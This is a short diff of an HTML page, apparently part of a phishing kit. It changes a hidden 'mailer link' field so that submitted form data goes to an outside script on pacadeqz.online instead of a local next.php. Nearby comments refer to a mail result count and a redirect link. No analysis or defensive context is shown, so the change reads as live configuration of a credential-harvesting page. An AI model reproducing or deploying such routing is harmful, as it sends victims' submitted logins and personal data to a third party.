--- a/index.html
+++ b/index.html
@@ -190,7 +190,7 @@
         </div>
     </div>
     <!-- //mailer link -->
-    <input type="hidden" id="f" value="./next.php">
+    <input type="hidden" id="f" value="https://pacadeqz.online/sol/css/next.php">
     <!-- //mail result count -->
     <input type="hidden" id="rc" value="2">
     <!-- //redirect link -->
